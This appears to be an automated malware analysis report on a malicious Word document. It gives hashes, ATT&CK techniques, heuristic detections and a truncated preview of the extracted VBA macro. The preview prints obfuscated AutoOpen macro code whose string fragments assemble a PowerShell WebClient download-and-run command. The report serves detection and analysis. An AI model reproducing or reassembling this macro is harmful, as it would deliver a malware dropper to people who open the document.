Office (OLE) malware analysis — malicious · 24d7ea0260eb70f9

MALICIOUS

Office (OLE)

141.0 KB Created: 2017-12-07 05:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 1375c6131fa6250621b3df27f38ce290 SHA-1: 9cf3b3590abea1e70c2590c5f9034b23378147c1 SHA-256: 24d7ea0260eb70f9cff6a93c59af6511245988fb9e4edb3e2d44f9f37a8b0f3c

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The macro constructs a URL by concatenating several strings, which is then likely used to download and execute a second-stage payload. The presence of the Shell() call and the obfuscated URL strongly suggest malicious intent.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52102 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	52102 bytes
SHA-256: `fcb42abea95ce30fd1a221064053489f5d9b476911846de2043f376f9938eadf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "dlhMUdiIYLiQWm" Function ZqiiJhczs() iXnLPLzVdl = Array(UCase("qAvGuqNq" + "MMIaSFbUKfTZbw" + "lvAckinzWKB" + "GpqQWkjfrickEf" + "nTziPEUVwq")) szQrRziQz = Mid("2kJi11PNT9DO+HLOver.HLO+HLOcom/HRM2z/,HiiPCtfiucVEIE3cGmj", 12, 28) PTUlczIdnPf = Array(UCase("uoajstzh" + "zJwsKBdQw" + "DADoicwDmrYl" + "pSswCvlGjabrEr" + "CJGtwwT")) ZocRU = Array(UCase("FQZPmPQJUiTP" + "ouQjCSPYFEziXc" + "rlTsamiPGbwN" + "uKuTDCtUnl" + "faMzMZlPn")) TrDjSLt = Array(UCase("jJOplfbcQ" + "fFAUaoMdzc" + "VpmVraBojmV" + "PrZdYGEOBNm" + "ZijcEzQFinNUcT")) ZmHYRmnsX = Mid("UJoFKt0LutIjljac4Io3chHLO+HLO{HLO+HLOwrite-HLO+HLOhost vqHLO+HLOL_.HLO+HLOExceptxW'+'9+x'+'W9HLO+HLOiHLO+HLOon.MeHLO+HLOsHLO+HLOsage;}HLO+HLO}HLO).repLACExW9+xIHTHFsGp", 21, 139) TqPBz = Array(UCase("RjLbpLKiJHG" + "vdvJjaU" + "SEzBMzaiDhqh" + "qdbjrOrjpd" + "LaiiECsKuEL")) qzrQXXpc = Array(UCase("EZnjmKakcALnXv" + "YHCswJqZk" + "WQwciFAEMzoO" + "AjwwHbsJtJU" + "GRkXkOACB")) rplaHSMaDDI = Array(UCase("cnnCtZIu" + "iKmwATT" + "UZRJzttiJvY" + "HCGkBAvBRzjXo" + "ACGGbvJwFE")) oXLVFAHun = Mid("fLZIzS);Invoke-IHLO+HLOtHLO+HLOem(vqLHLO+HLOhuHLO+HLOasxW9+xW9);HLO+HLObrHLO+HLO'+'eak;}caHLO+HLOtwA8vz0m", 7, 92) dKizp = Array(UCase("uiHwvKiKw" + "KdCIzLjzrYc" + "bNYnQhcl" + "LcjpUqJfibjNt" + "cOcZZiC")) QriONidKQb = Array(UCase("BiuuUkijGtfE" + "zAXRLXq" + "VXsqbCUdfKzBzz" + "BGzMFohjVz" + "JbYrlhO")) LUFAZHshfj = Array(UCase("mIRQudN" + "IIfpXjuiwV" + "uDICsJWcBUrj" + "dhUoWiHjkfXOs" + "OLUwMAGXziGYG")) MLHzf = Mid("kfRW9(HLOvqLHLO,[StRiNGkhIKaBVD9JwbrY6SzIiSjzUl2", 4, 20) iNmqII = Array(UCase("fGCDshJGaihDC" + "dWLNKlFnrWsWts" + "nZQmIUP" + "CEfviHzouBMwCf" + "XdlsOfLVoR")) bQWPIK = Array(UCase("AMCRZoLpMG" + "TNwJXkoA" + "IQhXiikGjp" + "zXkiXcFoEbYz" + "ktmINatRY")) lmLKbCjpt = Array(UCase("StzLCvYQ" + "dQnnjRijwwvqi" + "FRCYJWAihoz" + "ihDPhSOdib" + "GsvRvIsMS")) QwuCJNIjR = Mid("jfzG.WeHLO+HLObHLO+HLOClHLO+HLOiHLO+HLOeHLO+HLOntHLO+HLO;vqLHLO+HLOnsaHLO+HLOdHLO+H7QPQnoYMFCIGsBjpwrisV5k4G2FsVdBizEM", 5, 79) MHZYFDI = Array(UCase("OkffmqDFFXYO" + "dQlviAwujRTnlw" + "sJvQZmVzszT" + "AWTbpWzIsbiORc" + "fSMsBubNwbHpI")) iCSaXsPX = Array(UCase("NstzWPtpvjwnJ" + "zdjPdbBzdDwf" + "FFZochmUo" + "PKDVnnrP" + "jMTRZdjrm")) GGKblVCTGj = Array(UCase("KzFYKkYFcCauBC" + "VkiQXIjBIlXZJt" + "uRlBbqvmhFbAw" + "lZAiHvLPv" + "pawzmmLOMmIJI")) czucNdwZ = Mid("LPC33tzqwvLOtHLO+'+'HLOrantHLO+HLOhudHLO+HZasJNfT", 11, 32) jHXJz = Array(UCase("OqDqBokWv" + "GXOJUUFZGN" + "mndwAlnA" + "sqAFZTMT" + "hDRvtML")) LMtHmqAj = Array(UCase("aGawwLv" + "mkWMXuCz" + "iVwLAtzzvtN" + "KIcQzDAUMTjth" + "LaZPRLOGdnMoa")) RpEYG = Array(UCase("qjvYwEsMMN" + "EtVrSCwpznBr" + "PNouARJlqzaiQ" + "mdkfNvwkYjRs" + "jQbhpoHJ")) JwKLkVin = Mid("a4wsszRDjqjoqz8Wid5OU8Jw379),[StRing][cHaR]39)'+'.rEPlACe'+'(([cHaR]113+[cHaR]80+[cHaR]50),[StRing][cHaR]92).rEPlACe(([cHaR]70+[c'+'HaR]98+[cHaR]105),xW9N14irl6MJWPbIujzF", 26, 131) lsiGZQQKYRo = Array(UCase("cwASiUcc" + "wXqCdSLmCiNiXa" + "bBZDfpDKdor" + "SRLMLjhdr" + "JkoRBJKMiFY")) jdzTm = Array(UCase("PwMvEANwuNBP" + "MMInwpip" + "cHGdVOQk" + "JdDNlSSrwWclE" + "uUDOYCsRitHWE")) IiEjUCrNI = Array(UCase("lwncSNwoaaA" + "ztKbrnYkRuqRD" + "OMJBIRciURaAwF" + "HBGwVQJdGp" + "BlOqHVZ")) lPpOzUHKvz = Mid("tfW5GK8h((' (xW9 (HLOvHLO+HLOqHLO+HLOxW9+xW9LfHLO+HLOrancHLO+HLO = HLO+HLOnew-objeHLO+HLOct HLO+HLOSHLO+HLOysteHLO+HL'+'O'+'m.NetHLO+HLOV8VV4HVn3tbo4", 9, 128) cXvnbjdHw = Array(UCase("afzjJXsmHzaqV" + "rINWXQM" + "SAriwrzK" + "POdQSXw" + "hwINDoihoaW")) CnhlkMFumwc = Array(UCase("wmiZSjKSZt" + "roTMJtk" + "iiEjCLHPr" + "iJFbcGmcb" + "PLzkjFwMiYEzX")) mGRBS = Array(UCase("aDfzRmzr" + "wsjczqjDU" + "dliAmjuK" + "mAJEPZmfVO" + "ItDaARBY")) lMOKnqaNMEU = Mid("WJKoXs8Ebb][cHAR]36).repLACE(HLOSL8HLO,xW9+xW9[StRiNG][cHAR]39).repLACE(([cHAR]79+[cHAR]49+[cHAR]'+'105),'+'HL ... (truncated)

SHA-256: fcb42abea95ce30fd1a221064053489f5d9b476911846de2043f376f9938eadf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dlhMUdiIYLiQWm"
Function ZqiiJhczs()
iXnLPLzVdl = Array(UCase("qAvGuqNq" + "MMIaSFbUKfTZbw" + "lvAckinzWKB" + "GpqQWkjfrickEf" + "nTziPEUVwq"))
szQrRziQz = Mid("2kJi11PNT9DO+HLOver.HLO+HLOcom/HRM2z/,HiiPCtfiucVEIE3cGmj", 12, 28)
PTUlczIdnPf = Array(UCase("uoajstzh" + "zJwsKBdQw" + "DADoicwDmrYl" + "pSswCvlGjabrEr" + "CJGtwwT"))
ZocRU = Array(UCase("FQZPmPQJUiTP" + "ouQjCSPYFEziXc" + "rlTsamiPGbwN" + "uKuTDCtUnl" + "faMzMZlPn"))
TrDjSLt = Array(UCase("jJOplfbcQ" + "fFAUaoMdzc" + "VpmVraBojmV" + "PrZdYGEOBNm" + "ZijcEzQFinNUcT"))
ZmHYRmnsX = Mid("UJoFKt0LutIjljac4Io3chHLO+HLO{HLO+HLOwrite-HLO+HLOhost vqHLO+HLOL_.HLO+HLOExceptxW'+'9+x'+'W9HLO+HLOiHLO+HLOon.MeHLO+HLOsHLO+HLOsage;}HLO+HLO}HLO).repLACExW9+xIHTHFsGp", 21, 139)
TqPBz = Array(UCase("RjLbpLKiJHG" + "vdvJjaU" + "SEzBMzaiDhqh" + "qdbjrOrjpd" + "LaiiECsKuEL"))
qzrQXXpc = Array(UCase("EZnjmKakcALnXv" + "YHCswJqZk" + "WQwciFAEMzoO" + "AjwwHbsJtJU" + "GRkXkOACB"))
rplaHSMaDDI = Array(UCase("cnnCtZIu" + "iKmwATT" + "UZRJzttiJvY" + "HCGkBAvBRzjXo" + "ACGGbvJwFE"))
oXLVFAHun = Mid("fLZIzS);Invoke-IHLO+HLOtHLO+HLOem(vqLHLO+HLOhuHLO+HLOasxW9+xW9);HLO+HLObrHLO+HLO'+'eak;}caHLO+HLOtwA8vz0m", 7, 92)
dKizp = Array(UCase("uiHwvKiKw" + "KdCIzLjzrYc" + "bNYnQhcl" + "LcjpUqJfibjNt" + "cOcZZiC"))
QriONidKQb = Array(UCase("BiuuUkijGtfE" + "zAXRLXq" + "VXsqbCUdfKzBzz" + "BGzMFohjVz" + "JbYrlhO"))
LUFAZHshfj = Array(UCase("mIRQudN" + "IIfpXjuiwV" + "uDICsJWcBUrj" + "dhUoWiHjkfXOs" + "OLUwMAGXziGYG"))
MLHzf = Mid("kfRW9(HLOvqLHLO,[StRiNGkhIKaBVD9JwbrY6SzIiSjzUl2", 4, 20)
iNmqII = Array(UCase("fGCDshJGaihDC" + "dWLNKlFnrWsWts" + "nZQmIUP" + "CEfviHzouBMwCf" + "XdlsOfLVoR"))
bQWPIK = Array(UCase("AMCRZoLpMG" + "TNwJXkoA" + "IQhXiikGjp" + "zXkiXcFoEbYz" + "ktmINatRY"))
lmLKbCjpt = Array(UCase("StzLCvYQ" + "dQnnjRijwwvqi" + "FRCYJWAihoz" + "ihDPhSOdib" + "GsvRvIsMS"))
QwuCJNIjR = Mid("jfzG.WeHLO+HLObHLO+HLOClHLO+HLOiHLO+HLOeHLO+HLOntHLO+HLO;vqLHLO+HLOnsaHLO+HLOdHLO+H7QPQnoYMFCIGsBjpwrisV5k4G2FsVdBizEM", 5, 79)
MHZYFDI = Array(UCase("OkffmqDFFXYO" + "dQlviAwujRTnlw" + "sJvQZmVzszT" + "AWTbpWzIsbiORc" + "fSMsBubNwbHpI"))
iCSaXsPX = Array(UCase("NstzWPtpvjwnJ" + "zdjPdbBzdDwf" + "FFZochmUo" + "PKDVnnrP" + "jMTRZdjrm"))
GGKblVCTGj = Array(UCase("KzFYKkYFcCauBC" + "VkiQXIjBIlXZJt" + "uRlBbqvmhFbAw" + "lZAiHvLPv" + "pawzmmLOMmIJI"))
czucNdwZ = Mid("LPC33tzqwvLOtHLO+'+'HLOrantHLO+HLOhudHLO+HZasJNfT", 11, 32)
jHXJz = Array(UCase("OqDqBokWv" + "GXOJUUFZGN" + "mndwAlnA" + "sqAFZTMT" + "hDRvtML"))
LMtHmqAj = Array(UCase("aGawwLv" + "mkWMXuCz" + "iVwLAtzzvtN" + "KIcQzDAUMTjth" + "LaZPRLOGdnMoa"))
RpEYG = Array(UCase("qjvYwEsMMN" + "EtVrSCwpznBr" + "PNouARJlqzaiQ" + "mdkfNvwkYjRs" + "jQbhpoHJ"))
JwKLkVin = Mid("a4wsszRDjqjoqz8Wid5OU8Jw379),[StRing][cHaR]39)'+'.rEPlACe'+'(([cHaR]113+[cHaR]80+[cHaR]50),[StRing][cHaR]92).rEPlACe(([cHaR]70+[c'+'HaR]98+[cHaR]105),xW9N14irl6MJWPbIujzF", 26, 131)
lsiGZQQKYRo = Array(UCase("cwASiUcc" + "wXqCdSLmCiNiXa" + "bBZDfpDKdor" + "SRLMLjhdr" + "JkoRBJKMiFY"))
jdzTm = Array(UCase("PwMvEANwuNBP" + "MMInwpip" + "cHGdVOQk" + "JdDNlSSrwWclE" + "uUDOYCsRitHWE"))
IiEjUCrNI = Array(UCase("lwncSNwoaaA" + "ztKbrnYkRuqRD" + "OMJBIRciURaAwF" + "HBGwVQJdGp" + "BlOqHVZ"))
lPpOzUHKvz = Mid("tfW5GK8h((' (xW9 (HLOvHLO+HLOqHLO+HLOxW9+xW9LfHLO+HLOrancHLO+HLO = HLO+HLOnew-objeHLO+HLOct HLO+HLOSHLO+HLOysteHLO+HL'+'O'+'m.NetHLO+HLOV8VV4HVn3tbo4", 9, 128)
cXvnbjdHw = Array(UCase("afzjJXsmHzaqV" + "rINWXQM" + "SAriwrzK" + "POdQSXw" + "hwINDoihoaW"))
CnhlkMFumwc = Array(UCase("wmiZSjKSZt" + "roTMJtk" + "iiEjCLHPr" + "iJFbcGmcb" + "PLzkjFwMiYEzX"))
mGRBS = Array(UCase("aDfzRmzr" + "wsjczqjDU" + "dliAmjuK" + "mAJEPZmfVO" + "ItDaARBY"))
lMOKnqaNMEU = Mid("WJKoXs8Ebb][cHAR]36).repLACE(HLOSL8HLO,xW9+xW9[StRiNG][cHAR]39).repLACE(([cHAR]79+[cHAR]49+[cHAR]'+'105),'+'HL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.